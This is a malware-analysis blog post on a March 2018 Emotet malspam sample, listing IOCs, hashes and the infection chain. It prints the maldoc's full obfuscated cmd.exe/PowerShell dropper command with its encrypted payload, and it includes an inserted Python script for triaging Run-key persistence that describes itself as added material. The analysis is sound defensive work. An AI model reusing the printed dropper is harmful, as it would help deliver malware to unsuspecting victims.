2018-03-09 Emotet From Malspam

A quick post today for some more Emotet malspam that I was able to find. Nothing really special about this one, with the exception of it using punycode for the URL. Outside of that, this is pretty much the standard Emotet infection that most have seen. I did notice, though, that my run of the maldoc and the run within Any.Run resulted in a somewhat different chain. Maybe the difference is between 32-bit and 64-bit Windows 7; at this time I am not sure.

As usual, artifacts and such can be found via my repo here.

IOCs:
=====
78.109.16.225 / hxxp://electro-dom.od.ua/ (GET /rzhN/)
103.233.58.6 (encrypted POST)

*Other domains from maldoc*
hxxp://bigtime-xl.com/Mmr1Ev5/
hxxp://vellstore.ru/vXQJu6/
hxxp://midnightdjs.com.au/upGG/
hxxp://souz-rti.ru/KwzLDvH/

Artifacts:
==========
File name: 932-66-888068-336 & 932-66-888068-967.doc
File size: 252KB
File path: NA
MD5 hash: 1b599500aa99378cd37f63f0a78dd480
Virustotal: http://www.virustotal.com/#/file/a6116a475276f54b7d36b49fd42ba78b739443f8dd0bb2825440357d56025497/community
Detection ratio: 9 / 59
First Detected: 2018-03-09 15:15:42
Hybrid Analysis: http://www.hybrid-analysis.com/sample/a6116a475276f54b7d36b49fd42ba78b739443f8dd0bb2825440357d56025497?environmentId=100
Any.Run: http://app.any.run/tasks/4c731dc9-5e8b-433c-aaca-3c4280652ac9

File name: wlanwin.exe
File size: 110KB
File path: C:\Users\%username%\AppData\Local\Microsoft\Windows
MD5 hash: 6fcf18998001fa2186de3437db37da17
Virustotal: http://www.virustotal.com/#/file/a219eca45d933999649b946372869ad39f3ee5229a639baafe75595303e0ed4c/detection
Detection ratio: 19 / 68
First Detected: 2018-03-09 17:35:51

Analysis:
=========

As seen above, this is pretty straightforward. Once the maldoc is run, cmd.exe is launched, which then proceeds to call PowerShell. I was not able to capture the script myself, but Any.Run was able to grab it for me. The script looks like this:

"C:\Windows\System32\cmd.exe" zVoSBnj FRmMXVGNAIVQftclDDDiPD sTtMChdLS &     %C^om^S^pEc%       %C^om^S^pEc%            /V         /c           set %sunBlBEzMwOmFMs%=EaXZXllRJbWcz&&set %iSqdhqvSVLWO%=p&&set %jviYErzBt%=ow&&set %VLHtjFEDNjvzaLM%=bpoLochJIJ&&set %iHFAzUYiKY%=!%iSqdhqvSVLWO%!&&set %GJVsJibBqnHtVHo%=qucZwaZwimhQ&&set %DmsDMwaJWBwDc%=er&&set %hbEjLOzIDtZH%=!%jviYErzBt%!&&set %uiMpvtriNKtoKs%=s&&set %JsdwlawuhUWQYZU%=NhThXEmnhi&&set %SSkocnqomiVv%=he&&set %zMUjTid%=ll&&!%iHFAzUYiKY%!!%hbEjLOzIDtZH%!!%DmsDMwaJWBwDc%!!%uiMpvtriNKtoKs%!!%SSkocnqomiVv%!!%zMUjTid%! "( [rUNTImE.INtEropsErViCEs.MaRsHal]::([ruNtIME.iNTeroPsErViCes.MARShAL].GetmembERs()[5].NaMe).INVoke( [rUNtIME.INTeRopServIcES.mARshAl]::SEcurEStRINgtOBstr( $('76492d1116743f0423413b16050a5345MgB8AGsASgA0ADQARQBGAHIAVwBOAHMARwBvAC8ASABQADYAVgBKAGYAUABJAFEAPQA9AHwAMAA2AGIAYQAyAGEAZgAyADEAMwA4AGQANwAwAGUAMABiAGEAOABmAGYAMwAzAGQAOQAwAGUAMQBmAGMANABmADYAZQAwADMAOABjADYAOABmADkAZQBhAGQAZgBmAGIAYQBjADYAZQAwADAAZAA4AGYAMABlADUANABjAGMANABmADcAYQAyAGYANwBlADEAMwBlAGYAMgAyADQANgA0AGQAOAAwADQANQBkAGMAYgBiAGMAZQBjADgAYQA0ADcAZAA5ADkAMwAzAGIAOAAzAGEAZQA1ADUAMwBlADkAYgBjADkAMABhADMANgAzAGIAYgBmADMAMwBkADcAZQAwADEAZgBkADcAZAA0ADMANwA5ADgANAAwADcANwA5ADYAMQBmAGMANwA3ADkAZAA3AGIAMQBkAGMAZAA3AGEAYwA0ADUANAA1ADEAOAAzADEAMgA4AGMAMQAyADEAMQBhAGIAMgA4AGUAYgA0ADQAOQBjADAAMAAzADIAOQA0ADAAMQAxAGEAOAA1ADkAZgA0ADMAZgAzADYANwBlADgAYgBjAGYANQBlADgAMAA5AGMAZQA3AGEAOAA5AGIAMgA1ADYAMwA1ADkAZAAyADAAMgA4ADkANABlAGQAMwBmADYAMgA2ADcAMQAwAGUAMQBiADEAOAA3ADAAMAA5ADAAZAA1ADIANAA4ADIAOABmADIANAAwADgAOQBmADYAOQBmADgAYwAzADcANgAyADQANgAwADMAOQBiADkANABmADcAYgA3ADUAYQA2ADcAOAAyAGMAMwA0AGUAYwBkAGQAMABmADUANgBmAGEAYwAyADIAMQBiAGQANwA3ADUAMgA5ADEAYwAyADkANwA5ADMAMwA3AGEAZQBjADcAYQAxADIANgA2ADAANQA5AGMANgAxADkAZQAxADcANQAyADYAZQA4ADQAZgAyAGQAOAA5AGIAMgBmAGUAZgA1ADYAMAA3AGIAYQAwADcAMgA5ADQAYwBhAGIANwA4ADcAYwBmADcAZQBiAGEAZgA1AGEANQA2AGYAZAAzADAAOAA0AGMAZgAwADkAOABmAGIAMgA1ADgAMAAwAGUANQBkADkAYwA3ADEAYwA2ADAAYgAwADgAYwBhADYAMgA0ADEAMwAxAGYAYwA0AGIAZABkAGUANQBlADcAMQBhADMAYwBhADIAMQAyAGMANABhAGEAOAA2AGYANAAwADkAOAA1AGIAMQAwADYAOAA5ADkAYQA2ADYAMwBmAGUAOAAzADIAOQA0AGIAZAA2ADEANQBmADAAMwAwADcAMgA0ADUAOABjADEAMAA1ADgANgBhADIAYQBjADkAZgBhADMAYQAxAGQAZAA4ADAAYwAyAGUANQBkAGMAZQAwADUANAAzADQAMAAwAGEANABjADYAZgA2ADAANQA5AGMAYQBiAGQAZQAzADMAZgA4AGUAMAAxAGYAOAA2ADYAMgA2AGUAMwA5ADkAZgBkAGYAMABiAGQAZQA5ADMANwA2ADAAOQBlAGYAZQAzADYANABmAGEANwA3ADcAZQAxADUANQA1ADQANwBjADAAMgBlADEAZQBiADkANwA2ADkANQAwAGMANgAzAGMAZgA2ADMAMgAxAGQAOAAzAGYAYQAwAGEAMwAzAGMANABjAGUAZABlAGYAMAA4AGYAMwAwADAAMABlAGIAYgBmAGYAMwBlAGEANAA2AGQANwAzAGYAMwAwADAAYQAxADcANgA2AGIANQBlADQAOABhADEAOQAxADgAMAAyAGEAMABkADQAMQBjADgANgBiADYANAAyADMAZQBjAGUANQBmAGEAZQBhAGUAMgA4ADEAOQBhADIAOABhADIANQAyADUAMABlAGMANQBlADkANwA1ADgAZAAxADEAMwBmAGYAZgA2AGUANwA5ADIAOQBiADYAMQBlAGUANwBkADMAOABlAGUAZQBjADgANQBiAGUAMQAyAGYANwAzADIAMQBhADEANQAxADMAOAAyADkAMgBlAGMAYQA2ADkANwA4ADQANQAzADUAZgA5ADIAOABkAGYAMABiAGMAYwBlADkAMQA5ADgAYwA1AGIAMwA2AGQANgBiAGUAZQA2AGIAOQBiAGEAZABjADAAYgAzAGUAMwA5ADIAMwA3ADAAMAAwAGMAMwBiADkAYwAxAGYAOABjADYAOABmAGUAZQA1AGYAYQBmAGQAYQA0ADIANgAxADgAZgBmAGUAMQAxAGQAMQA5ADUANgBjADkAYgBlADkAOQBkADUAMgBhADkANQA4ADcANABmADMANAA3AGMAMgAyADQAZgBiADYAOQA1ADAAMAA1AGMANQA2ADMAZgBmAGQANgBiADkANwA3ADQANwBhAGEAMABhAGEAYQA4AGQAMAA1ADEAMgA3ADQAMgAyAGYAMQBkAGEAYwAwADUAMwA4ADcAZQA4ADcAZABiAGUANwBhADQAYgA5AGQAMwAwAGIANwBmADMAZgA1ADkAMgA5ADkANAAyAGYAMAA3AGUANwA2AGQAOQBlADYAYwA5ADEANQAxADIAMABhAGQAOAAzADQANwAzADAAYQAxAGYAZgAzADgAMQA5AGYAMQA5ADQAZABiADYAZQBiAGMAYQBjADUAMgAwADcAMABhADMAZQBlADkAZQA5AGQAMAA0ADcANQBjADcANAA1ADEAYgA0ADUAOABmAGYANAA2ADUAZgAxAGUANgA5ADEAZQBiAGUAYwA0AGQANgAzADkAOABiADIAZAA5AGYAYQA4ADQAZQA1ADAANQA4AGMAMgA1ADAAMQAwAGQAMgBjADYAYgAzAGIANQBkAGUAMwBhADQAYgA2AGEAZgAzADgAYQBiADIAZABmADkAZgA2AGUANwA5AGQANgA4AGEAMABjAGYAZQA2AGEAMgAxADEAOQBkAGYAYQBiADkAOQAyADMANgAzADMAMwBjAGIAOQAwADQAMwA0AGUANQBmAGMAZABiADMAOQBlADAANABkADkAYgA0ADIANgA4ADIAMAA4AGIANQBlADIANwBmAGUAMAA1AGIAZQA0ADgAOAAyAGEAMAA1ADAAMAA2ADQAZgA3ADkAOQA2ADYAZgBlADYAMgBmADMAZgBjAGUANgBmADkAMgAyADcAOABkADUAMgBiAGEAMAA4ADkAYgAxAGEAYgA5ADgAMgA3ADEAYwBiADgAZQA1AGEANgA5ADYAZAA4AGQAYgBlADkAYwBkADUAYQA4ADgAZQAwADYANwAzAGYAZgAyADIANABiADAAMQAwADUAMwA1ADEANQA0AGMANgA2ADkAZgAxADAAMwA3AGIAYwA5AGIANgBiADIAMABhADMAZABkAGQAOAAzAGMANAAyADkAYgA1AGIAOAA0ADgAMQBjADkAZABhADMAYgA0ADMAOABiADYANwBiADYAMQAwADAAZQA5AGMAOQAzADYAOABjADEAMgBiADAAYQA4ADcANwAxADgAZgAzAGQANwAwADcAYgA5ADUAMgBiADYAYwA2ADIAMQAzAGMAMwA0AGIAMgBkADIAMgBiAGMAMQBlAGIANgBhADYAMAAyADAAZgA1ADYAMAA1AGEAYgA4ADcAZQA0ADgAZAA1ADAANwAyAGUAMQAwADQANQAxAGUANQA0ADkANgAzADAAYwA2AGIAZgBiADMAMQBjADEAYgA5ADUAMABlADcANgAyAGIAMgBjAGMANwA5AGMAZQA2AGYAMwBmADIAZgA5ADAAYwA2ADYAYwBjADkANgA5AGIAZgA0ADYAYQA2ADIANAAxADcAYwAwADgAMgA0AGYAMAAwAGUAYgAxADAANgA3ADgANQA0ADkANgA3ADIAOQA1ADYAOQA1ADUAMABlAGQAMQA0AGEAMwBkAGQANgAyADYAMwA0ADkANwAwADUAMQBhADIANABhADEAMABhAGUANQA2AGUANQA4AGIANwBlADIAOQA4ADAAZQA5ADkAMQBjADYAZQAzADQAOQBmADkAMgAzADQANQA4AGYAZQBmADUAYwAzADgAOQBiADAAOQAzAGIANwBiAGIAMQBmADgAZAA5ADUANwBiAGEANQA4ADgANwA3AGEANgA2ADYAMABmADkAYwA5ADIAYwBkADgAZQBlAGYAZAA2ADkAMAAzAGUAOQBjAGQANAAxADgAYgBlADYANAAzAGYAYwA2ADkANgBiADkAMQAyADEAMgBhADQAOABiAGEAMQAwADgAYQBlAGIAZQA0ADQAMQA3AGUAOAAyAGMAZgAyADMAMQA4AGUAZQBmAGUAYwBkAGIAOQBkADUAYwAwADUANAA3AGMAZgA3AGMANAA3AGEAYwA3AGYAOQAwADcAYwA3AGYAMAA1AGEAYQBhAGYANQA2AGEANQA4ADUAYQAxAGEAOQAzAGMAMABmAGEANABlADAAMgA4ADYAYwBlADMAMABmAGIAMwAyADgAMAA1ADAANwA1ADkAZQAyAGYAYQA5AGMAMAAxADIAOQA4ADcAMgBlAGEAZgAxAGQAZQAyADYAZgAwADkAMABkADEANwBjAGEAMQA1ADcAZgA3ADAAMABmADIAZgBjADEAYwAwAGYAYgA0ADYANAA4AGEAMQA2ADYANQAzAGIAMQA5ADEAZQA2ADYANQAyADgAZgA5ADkAMAAwAGIAMwAxADkAMwBhAGEAOAA2ADMAMgA2ADkAOQAwAGEAMAA1ADMAMwA4ADIAZgAxADcAZgBiAGIANgBjADUAYgA0AGEAZgA1ADcAYwA0ADYAYwAxADEANAA2ADYAMgAyADQAZAAxADIANgA0ADUAMgBlAGUAOQA2AGMAYgBjADkAMgAzAGIAMAAzAGUANgA0ADgAYgA2ADkAMwAzADYAZQBkADgAYQA5AGUAYgAzADkAZABhADMANgA5ADgANQBlADEAOQA3AGMAZgAyADgAYwA2ADIANAA3ADkANgA4ADgANwBkADAAZAA4ADkAMABiAGEAOABjADAANAA5AGMAYQA5ADkANABkADMANgBkADcAMQAwAGQAZAA0AGQAZAA0ADcAOABlAGUAZQA5AGYAYwAwADkAZQBjADkAYgBlADEANwA2AGYAMQA4ADkAOAAyADMAZABjADcANgAxAGQAZQBjADUAOQBlADgAYQAyAGIAOABmADQAMAA1ADIAOQAwAGQAOQBhADYAMAA3ADgAOQA5ADcAZQA2ADgAMAA3AGQAMwBjADMANAAxADAAMAA1ADkAYgA2AGMAYQBmAGIAYQAwADcAOABmADIANAA=' |ConVeRTto-SecurestRiNg -KE  (32..9))) ) ) |. ((gv '*Mdr*').NaMe[3,11,2]-JOiN'')

which decoded looks like this:

powershell  "( [rUNTImE.INtEropsErViCEs.MaRsHal]::([ruNtIME.iNTeroPsErViCes.MARShAL].GetmembERs()[5].NaMe).INVoke( [rUNtIME.INTeRopServIcES.mARshAl]::SEcurEStRINgtOBstr( $('<same encrypted string as above>' |ConVeRTto-SecurestRiNg -KE  (32..9))) ) ) |. ((gv '*Mdr*').NaMe[3,11,2]-JOiN'')

We then see the '239833.exe' process start up and create a child process, and that child process then creates two more processes. This is one of Emotet's calling cards: wlanwin.exe running from the 'C:\Users\%username%\AppData\Local\Microsoft\Windows' path. Note that the 'wlanwin.exe' process is the same file as the '239833.exe' process, as a rename operation is called.

Persistence is maintained via the "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" registry key.
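A Run-key entry pointing at an executable inside the user's own profile, and specifically inside `%LOCALAPPDATA%\Microsoft\Windows` as described above, is the kind of thing a triage script can rank without any signature. The Python below is an added example (not from the post): it takes Run-key values as name/command pairs, pulls the executable path out of the command (quoted or first token), expands the profile variables from a constructed environment for a hypothetical user `analyst`, and assigns a tier. The `high` tier is tuned to the directory this post names; the `review` tier catches anything else under the user profile, which also catches legitimate per-user installs such as OneDrive, so it is a queue for a human, not a verdict.

```python
import ntpath
import re

# Constructed profile variables for a hypothetical user 'analyst' (assumption, not from the page).
ENV = {
    'USERPROFILE': r'C:\Users\analyst',
    'APPDATA': r'C:\Users\analyst\AppData\Roaming',
    'LOCALAPPDATA': r'C:\Users\analyst\AppData\Local',
}

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values.
# The first mimics the wlanwin.exe persistence described in the post; the others are benign shapes.
SAMPLE_RUN_VALUES = {
    'wlanwin': r'C:\Users\analyst\AppData\Local\Microsoft\Windows\wlanwin.exe',
    'OneDrive': r'"C:\Users\analyst\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    'SecurityHealth': r'%windir%\system32\SecurityHealthSystray.exe',
}

def expand_env(path, env):
    """Expand %VAR% tokens from the given table; unknown variables are left untouched."""
    return re.sub(r'%([^%]+)%', lambda m: env.get(m.group(1).upper(), m.group(0)), path)

def executable_of(command):
    """Return the program part of a Run value: the quoted path, or the first whitespace token."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split()[0]

def classify_run_value(command, env=ENV):
    """'high' for the %LOCALAPPDATA%\\Microsoft\\Windows drop folder, 'review' for any other
    user-profile path, 'ok' otherwise."""
    exe = expand_env(executable_of(command), env).lower()
    drop_dir = (env['LOCALAPPDATA'] + r'\Microsoft\Windows').lower()
    if ntpath.dirname(exe) == drop_dir:
        return 'high'
    if exe.startswith(env['USERPROFILE'].lower() + '\\'):
        return 'review'
    return 'ok'

def triage_run_values(values, env=ENV):
    """Map each Run value name to its tier so the result can be sorted or alerted on."""
    return {name: classify_run_value(cmd, env) for name, cmd in values.items()}

if __name__ == '__main__':
    for name, tier in sorted(triage_run_values(SAMPLE_RUN_VALUES).items(), key=lambda kv: kv[1]):
        print(f'{tier:7} {name}')
```

On a live host the same functions would be fed from `winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Run')` and `os.environ`; they are kept separate here so the logic runs anywhere. Pair the `high` tier with the file's hash and the process-rename event described above and you have the three artifacts that identify this infection.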

I also ran strings2.exe (http://split-code.com/strings2.html) against the running process (PID 2776) to see if I could find anything there. Unfortunately, I was not able to glean much. I have included the strings output, so if you find something, please let me know.
